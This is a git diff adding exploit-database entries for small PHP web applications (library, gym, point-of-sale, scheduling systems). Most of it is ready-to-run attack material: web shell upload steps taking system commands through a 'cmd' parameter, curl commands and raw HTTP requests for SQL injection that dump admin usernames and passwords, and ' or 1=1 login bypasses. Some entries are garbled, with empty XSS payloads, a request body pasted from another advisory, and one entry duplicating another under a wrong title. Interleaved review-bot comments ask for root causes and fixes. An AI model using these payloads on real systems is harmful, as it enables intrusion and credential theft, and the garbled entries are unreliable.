diff --git a/exploits/php/webapps/48636.txt b/exploits/php/webapps/48636.txt
index 35326f319..599c53baf 100644
--- a/exploits/php/webapps/48636.txt
+++ b/exploits/php/webapps/48636.txt
@@ -4,6 +4,7 @@
# Vendor Homepage: http://ritecms.com/
# Version: 2.2.1
# Tested on: Linux
+# CVE: CVE-2020-23934
1- Go to following url. >> http://(HOST)/cms/
2- Default username and password is admin:admin. We must know login credentials.
diff --git a/exploits/php/webapps/48928.txt b/exploits/php/webapps/48928.txt
new file mode 100644
index 000000000..cbc0e8d28
--- /dev/null
+++ b/exploits/php/webapps/48928.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload
+# Date: 22-10-2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14545/online-library-management-system-phpmysqli-full-source-code-2020.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14545&title=Online+Library+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code+%282020%29
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: http://localhost/librarysystem/admin/borrower/index.php?view=add
+
+#Exploit
+ Fill details
+ Create php shell code with below script
+ "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>
+ Click on Browse
+ Select php file
+ Click Save
+ Access below URL:
+ http://localhost/librarysystem/admin/borrower/photos/23102020080814backdoor.php?cmd=dir
+ add system commands after cmd to execute it.
\ No newline at end of file
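Review bot: The advisory never identifies the server-side check that is missing — which upload handler behind `admin/borrower/index.php?view=add` (L27) accepts the file, and whether it validates extension, MIME type or content before writing into `admin/borrower/photos/` (L37) — so a triager cannot confirm a fix from this text. Add a root-cause line naming the handler and the validation it lacks, plus a remediation line (extension allow-list, uploads stored outside the web root or in a directory with script execution disabled). The PHP fragment on L32 is also cut mid-statement, so the step cannot be followed as written; describe what the uploaded file is expected to do rather than pasting a partial snippet. The same gaps apply to 48931.txt (L94–L115: fragment on L108, upload path on L113).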
diff --git a/exploits/php/webapps/48930.txt b/exploits/php/webapps/48930.txt
new file mode 100644
index 000000000..2cf4e4bc8
--- /dev/null
+++ b/exploits/php/webapps/48930.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Stock Management System 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2020-10-22
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
+# Version: 1.0
+# Tested on: Linux
+# CVE: N/A
+
+# POC:
+# 1)
+#
+fetchSelectedBrand.php
+#
+$brandId = $_POST['brandId'];
+$sql = "SELECT brand_id, brand_name, brand_active, brand_status FROM brands WHERE brand_id = $brandId";
+#
+curl -i -s -k -X $'POST' \
+ -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 170' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+ -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \
+ --data-binary $'brandId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \
+ $'http://localhost/ExploitDb/stock/php_action/fetchSelectedBrand.php'
+#
+# POC:
+# 2)
+#
+fetchSelectedCategories.php
+#
+$categoriesId = $_POST['categoriesId'];
+$sql = "SELECT categories_id, categories_name, categories_active, categories_status FROM categories WHERE categories_id = $categoriesId";
+#
+curl -i -s -k -X $'POST' \
+ -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 175' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+ -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \
+ --data-binary $'categoriesId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \
+ $'http://localhost/ExploitDb/stock/php_action/fetchSelectedCategories.php'
+#
+# ++
+
+#
\ No newline at end of file
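Review bot: The quoted source on L61–L62 and L75–L76 shows `$_POST['brandId']` / `$_POST['categoriesId']` interpolated straight into the query string, but the advisory stops there and gives no remediation, which is what a maintainer reading this entry needs. Since both columns are ids, the fix is a prepared statement with a `?` placeholder and the value bound as an integer; a one-line `# Fix:` note saying so would make the entry actionable. The two `curl` invocations also carry a fixed `PHPSESSID` (L65–L66, L79–L80), so state whether the `php_action/` endpoints require an authenticated session or the cookie is incidental — pre- versus post-auth changes the severity.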
diff --git a/exploits/php/webapps/48931.txt b/exploits/php/webapps/48931.txt
new file mode 100644
index 000000000..cb8e3f691
--- /dev/null
+++ b/exploits/php/webapps/48931.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Car Rental Management System 1.0 - Arbitrary File Upload
+# Date: 22-10-2020
+# Exploit Author: Jyotsna Adhana and Saurav Shukla
+# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: http://localhost/carRental/admin/index.php?page=manage_car
+
+#Exploit
+ Fill details
+ Create php shell code with below script
+ "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>
+ Click on Browse
+ Select php file
+ Click Save
+ Access below URL:
+ http://localhost/carRental/admin/assets/uploads/cars_img/1603387740_backdoor.php?cmd=sysinfo
+ add system commands after cmd to execute it.
\ No newline at end of file
diff --git a/exploits/php/webapps/48932.txt b/exploits/php/webapps/48932.txt
new file mode 100644
index 000000000..62f60a454
--- /dev/null
+++ b/exploits/php/webapps/48932.txt
@@ -0,0 +1,23 @@
+# Exploit Title: User Registration & Login and User Management System 2.1 - SQL Injection
+# Dork: N/A
+# Date: 2020-10-22
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 2.1
+# Tested on: Linux
+# CVE: N/A
+
+# POC:
+# 1)
+#
+curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),3,4,5,6,7-- -" | grep fname
+
+curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),4,5,6,7-- -" | grep lname
+
+curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),5,6,7-- -" | grep email
+
+curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,4,5,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),7-- -" | grep contact
+#
+#
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/48933.txt b/exploits/php/webapps/48933.txt
new file mode 100644
index 000000000..70d7a6ecf
--- /dev/null
+++ b/exploits/php/webapps/48933.txt
@@ -0,0 +1,35 @@
+#Exploit Title: Point of Sales 1.0 - SQL Injection
+#Date: 2020-10-22
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/pos_0.zip
+#Version: V1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1: Open the URL http://localhost:8081/pos/edit_category.php?id=1
+
+Step 2: Change the URL http://localhost:8081/pos/edit_category.php?id=1'
+
+Step 3: Try to balance the query http://localhost:8081/pos/edit_category.php?id=1'--+
+
+Step 4: Find the number of columns http://localhost:8081/pos/edit_category.php?id=1' order by 1,2--+
+
+Step 5: Find which columns are visible http://localhost:8081/pos/edit_category.php?id=-1%27%20UNION%20Select%201,2--+
+
+
+Malicious Request:::
+
+GET /pos/edit_category.php?id=-1%27%20UNION%20Select%201,database()--+ HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
+Upgrade-Insecure-Requests: 1
+
+Gives database name *sourcecodester_posdb*
\ No newline at end of file
diff --git a/exploits/php/webapps/48934.txt b/exploits/php/webapps/48934.txt
new file mode 100644
index 000000000..65e66a57e
--- /dev/null
+++ b/exploits/php/webapps/48934.txt
@@ -0,0 +1,35 @@
+#Exploit Title: lot reservation management system 1.0 - Authentication Bypass
+#Date: 2020-10-22
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
+#Version: V1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1: Open the URL http://localhost:8081/lot-reservation-management-system/admin/login.php
+
+Step 2: use payload ' or 1=1 limit 1 -- -+ for both username and password.
+
+
+Malicious Request:::
+
+POST /lot-reservation-management-system/admin/ajax.php?action=login HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 71
+Origin: http://localhost:8081
+Connection: close
+Referer: http://localhost:8081/lot-reservation-management-system/admin/login.php
+Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
+
+username='+or+1%3D1+limit+1+--+-%2B&password='+or+1%3D1+limit+1+--+-%2B
+
+You will be login as admin of the application.
\ No newline at end of file
diff --git a/exploits/php/webapps/48935.txt b/exploits/php/webapps/48935.txt
new file mode 100644
index 000000000..73c0dc338
--- /dev/null
+++ b/exploits/php/webapps/48935.txt
@@ -0,0 +1,87 @@
+#Exploit Title: lot reservation management system 1.0 - Stored Cross Site Scripting
+#Date: 2020-10-22
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
+#Version: 1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions
+
+Step 2: Use payload in Name and Discription.
+
+
+Malicious Request:::
+POST /lot-reservation-management-system/admin/ajax.php?action=save_division HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------65714323539404637092301409097
+Content-Length: 613
+Origin: http://localhost:8081
+Connection: close
+Referer: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions
+Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
+
+-----------------------------65714323539404637092301409097
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------65714323539404637092301409097
+Content-Disposition: form-data; name="name"
+
+
+-----------------------------65714323539404637092301409097
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------65714323539404637092301409097
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------65714323539404637092301409097--
+
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="gender"
+
+Female
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="contact"
+
+9876543211
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="nid"
+
+12
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="address"
+
+Gujarat
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="dept"
+
+CS
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="degree"
+
+BE
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="salary"
+
+
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------3267707159765331982713791736--
+
+
+Cookie will be reflected on View Employee.
\ No newline at end of file
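Review bot: The request body is internally inconsistent: the multipart for `save_division` closes at L284, yet a second body with a different boundary and unrelated fields (`gender`, `contact`, `nid`, `dept`, `salary`, `file`, L286–L319) follows it, and the closing sentence on L322 refers to a "View Employee" page that the lot-reservation `divisions` page (L247) does not have — this looks pasted from another advisory. The `name` and `description` parts (L273–L274, L277–L278) are empty, so the request as printed stores nothing, and the declared `Content-Length: 613` (L261) is larger than the printed body, consistent with the payload having been stripped. Trim the body to the single `save_division` form, say which field is rendered without output encoding on the divisions listing, and correct "Discription" on L249. A remediation line (`htmlspecialchars` with `ENT_QUOTES` at render time) would round it off.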
diff --git a/exploits/php/webapps/48936.txt b/exploits/php/webapps/48936.txt
new file mode 100644
index 000000000..072d2c1b2
--- /dev/null
+++ b/exploits/php/webapps/48936.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Gym Management System 1.0 - 'id' SQL Injection
+# Date: 22/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#parameter Vulnerable: id
+# Injected Request
+
+GET /gym/gym/manage_user.php?id=-1+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/gym/gym/index.php?page=users
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re
+
+
+//Comment
+Above request will print database name and MariaDB version.
\ No newline at end of file
diff --git a/exploits/php/webapps/48937.txt b/exploits/php/webapps/48937.txt
new file mode 100644
index 000000000..d3c91c717
--- /dev/null
+++ b/exploits/php/webapps/48937.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Point of Sales 1.0 - 'username' SQL Injection
+# Date: 22/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14540&title=Point+of+Sales+in+PHP%2FPDO+with+Full+Source+Code+%282020%29
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#parameter Vulnerable: username
+# Injected Request
+
+POST /pos/pos/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 81
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/pos/pos/
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+username=admin' or '1'='1';SELECT SLEEP(5)#&password=admin' or '1'='1#&btn_login=
+
+//Comment
+The reponse will be delayed by 5s.
\ No newline at end of file
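Review bot: The payload on L387 is a stacked query (`;SELECT SLEEP(5)#`) against an application the title describes as PHP/PDO; presumably that only succeeds when the driver emulates prepared statements or the login concatenates the SQL and sends it unprepared, and the advisory should say which, because the remediation differs. Add a fix note along the lines of `# Fix: bind username/password via a prepared statement and set PDO::ATTR_EMULATE_PREPARES => false`. For defenders, the observable signal is a login POST whose response is delayed by roughly the sleep interval relative to baseline, which is worth stating next to L390. The `laravel_session`/`XSRF-TOKEN` cookies on L384 belong to a different application and should be dropped.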
diff --git a/exploits/php/webapps/48938.txt b/exploits/php/webapps/48938.txt
new file mode 100644
index 000000000..842a98f3e
--- /dev/null
+++ b/exploits/php/webapps/48938.txt
@@ -0,0 +1,24 @@
+# Exploit Title: School Faculty Scheduling System 1.0 - 'id' SQL Injection
+# Date: 22/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#parameter Vulnerable: id
+# Injected Request
+
+GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+
+//Comment
+Above request will print database name and MariaDB version.
\ No newline at end of file
diff --git a/exploits/php/webapps/48939.txt b/exploits/php/webapps/48939.txt
new file mode 100644
index 000000000..aa3f0cf67
--- /dev/null
+++ b/exploits/php/webapps/48939.txt
@@ -0,0 +1,24 @@
+# Exploit Title: School Faculty Scheduling System 1.0 - 'username' SQL Injection
+# Date: 22/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#parameter Vulnerable: id
+# Injected Request
+
+GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+
+//Comment
+Above request will print database name and MariaDB version.
\ No newline at end of file
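Review bot: The body of this entry is a verbatim copy of 48938.txt (L409–L421): the title on L429 announces a 'username' SQL injection, but L437 still says `#parameter Vulnerable: id` and the request on L440 is the same `manage_user.php?id=` GET as 48938. As published it documents the wrong finding, so either correct the entry to describe the username issue it claims or withdraw it as a duplicate. The `laravel_session`/`XSRF-TOKEN` cookies on L449 are also unrelated to this application and could be dropped.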
diff --git a/exploits/php/webapps/48940.txt b/exploits/php/webapps/48940.txt
new file mode 100644
index 000000000..d1c5d5e39
--- /dev/null
+++ b/exploits/php/webapps/48940.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Gym Management System 1.0 - Authentication Bypass
+# Date: 21/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+Step 1: Open the URL http://localhost/gym/gym/login.php
+
+Step 2: use payload jyot' or 1=1# in Username and Password field
+
+Malicious Request
+
+POST /gym/gym/ajax.php?action=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 55
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/gym/gym/login.php
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+
+username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23
+
+Step 3: You will be logged in as admin.
\ No newline at end of file
diff --git a/exploits/php/webapps/48941.txt b/exploits/php/webapps/48941.txt
new file mode 100644
index 000000000..f499043bd
--- /dev/null
+++ b/exploits/php/webapps/48941.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting
+# Date: 21/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+Step 1: Open the URL http://localhost/gym/gym/index.php?page=packages
+
+Step 2: use payload in Package Name and Description field
+
+Malicious Request
+POST /gym/gym/ajax.php?action=save_package HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------10391575234966392972740129710
+Content-Length: 587
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/gym/gym/index.php?page=packages
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+
+-----------------------------10391575234966392972740129710
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------10391575234966392972740129710
+Content-Disposition: form-data; name="package"
+
+
+-----------------------------10391575234966392972740129710
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------10391575234966392972740129710
